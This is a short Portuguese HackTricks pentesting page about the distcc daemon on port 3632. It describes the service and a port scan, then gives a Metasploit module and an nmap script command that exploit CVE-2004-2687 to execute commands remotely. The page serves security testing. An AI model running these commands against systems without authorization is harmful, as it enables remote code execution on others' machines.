hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.4 KiB

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Informação Básica

Distcc é uma ferramenta que aprimora o processo de compilação utilizando o poder de processamento ocioso de outros computadores na rede. Quando o distcc é configurado em uma máquina, essa máquina é capaz de distribuir suas tarefas de compilação para outro sistema. Este sistema receptor deve estar executando o daemon distccd e deve ter um compilador compatível instalado para processar o código enviado.

Porta padrão: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploração

Verifique se é vulnerável ao CVE-2004-2687 para executar código arbitrário:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

Não acredito que o shodan detecte este serviço.

Recursos

Post criado por Álex B (@r1p)

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: